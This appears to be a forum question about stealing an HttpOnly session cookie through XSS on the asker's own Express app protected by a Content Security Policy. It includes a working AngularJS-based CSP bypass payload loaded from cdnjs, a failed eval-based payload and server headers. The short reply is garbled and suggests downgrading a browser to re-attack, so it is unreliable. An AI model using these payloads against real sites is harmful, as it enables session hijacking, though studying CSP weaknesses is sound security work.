Stealing Cookies with XSS when HTTPOnly and CSP is enabled: Workarounds and Strategies
How can I steal cookie when HTTPOnly is on and CSP rules are defined? Assume that an attacker is given an inputfield that performs HTTP and that it is vulnerable for XSS attacks:
<form action="/createThread?topic={{lcTopic}}" method="post" class="">
    <h2 class="text-muted">New Thread</h2>
    <hr>
    <div class="form-group">
      <label>Body</label>
      <textarea type="text" rows="10" class="form-control" name="body" placeholder="Type the body of your thread here..."></textarea>
    </div>
    <button type="submit" class="btn btn-primary">Create Thread</button>
    <button type="button" id="threadPreview" class="btn btn-default">Preview</button>
  </form>`


In my server I have defined CSP rules as:
.use(
helmet.contentSecurityPolicy({
  directives: {
    defaultSrc: ["'self'"],
    scriptSrc: [
      "'self'",
      "cdnjs.cloudflare.com"
    ],
  },
})
)


The attacker could potentially bypass CSP by injecting the following code into the text field:
<!DOCTYPE html>
<html>
<head>
 <title>XSS Demo</title>
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></SCRIPT>
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js"></SCRIPT>
</head>
<body ng-app ng-csp>

 <div>
   <button ng-click="$on.curry.call().alert('xss')">Click Me! 
 </button>
    <div style="display:none;">
      {{$on.curry.call().alert('xss')}}
     </div>
 </div>

 </body>
</html>

Now, due to HTTPOnly being enabled, the attacker can't simply execute "alert(document.cookie)". What other methods can they employ to steal the cookie considering the CSP rules?
I tried a simple alert(document.cookie) but did not work due to HTTPOnly:
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Security-Policy: default-src 'self';script-src 'self' cdnjs.cloudflare.com;base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Content-Type: text/html; charset=utf-8
Content-Length: 5924
ETag: W/"1724-zhGBtITbjmwCa+un6GYhGKL+lwo"
Set-Cookie: connect.sid=THE COOKIE; Path=/; HttpOnly
Date: Sat, 27 Apr 2024 09:29:04 GMT
Connection: close

I even tried to do:
    {{$on.curry.call().eval("var url = '/'; fetch(url).then(response => console.log(response.headers.get('Set-Cookie')))")}}
but since CSP I get:
angular.js:5930 EvalError: Refused to evaluate a string as JavaScript because 'unsafe-eval' is not an allowed source of script in the following Content Security Policy directive: "script-src
NOTE: the attacker is obviously not allowed to change the servercode! He only has access to the input field!

In this case, Attacker can't get value from cookie.
Because, HttpOnly is activate.
This activity is right.
If do you success as JavaScript alert(), you should downgrade Web Browser and you should re attack.

Hmm. Ok. But why would I get evalError @Takuya Hatori? I am using the techniques described here:
https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass
